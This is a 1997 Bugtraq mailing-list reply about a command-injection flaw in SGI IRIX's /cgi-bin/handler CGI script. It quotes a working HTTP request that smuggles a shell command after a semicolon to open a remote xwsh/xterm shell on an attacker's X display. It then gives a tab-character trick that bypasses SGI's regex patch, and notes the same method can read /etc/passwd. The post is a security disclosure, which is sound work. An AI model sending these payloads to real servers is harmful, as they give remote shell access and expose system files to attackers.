[5011] in bugtraq
Re: CPSR 7: IRIX WWW Server
daemon@ATHENA.MIT.EDU (Lamont Granquist)
Thu Jul 24 19:17:19 1997
Date: Thu, 24 Jul 1997 14:15:20 -0700
Reply-To: Lamont Granquist <lamontg@hitl.washington.edu>
From: Lamont Granquist <lamontg@HITL.WASHINGTON.EDU>
X-To: Thomas Walter <balu@STUDST.FH-MUENSTER.DE>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <33D77A1C.1C41@studst.fh-muenster.de>
On Thu, 24 Jul 1997, Thomas Walter wrote:
> Trying 1.2.3.4...
> Connected to victim.
> Escape character is '^]'.
> GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e
> /bin/csh|?data=Download
> UX:sh (sh): ERROR: Connection closed by foreign host.
> enemy%
s/xwsh/xterm/ and this works the same.
to reiterate Razvan's follow-up to the original posting on the
cgi-bin/handler issue, in Irix 6.3 (O2s) they attempted to fix this with
the line:
# trim off trailing pipes
$doc =~ s/\|*$// ;
which can be fooled by appending a <tab> char after the pipe, thus:
GET /cgi-bin/handler/<tab>;xterm<tab>-display<tab>danish:0<tab>-e<tab>
/bin/sh|<tab>?data=Download
^^^^^^
(one line, emphasis under the necessary change)
which can be applied to the xwsh, or cat /etc/passwd attacks or whatever.
this is not matched by the pattern s/\|*$//, but the appended tab does
not change the behavior of perl's open(yadda, "yadda|") statement since
whitespace following the '|' is ignored.
Yuri's post to Bugtraq of Fri, 16 May 1997 #2551 at
http://www.netspace.org/lsv-archive/bugtraq.html is a good read for more
info on why SGIs /var/www/cgi-bin directory should be nuked with extreme
prejudice...
--
Lamont Granquist <lamontg@hitl.washington.edu> (206)616-1469 fax:(206)543-5380
Human Interface Technology Lab. University of Washington. Seattle, WA
PGP pubkey: finger lamontg@near.hitl.washington.edu
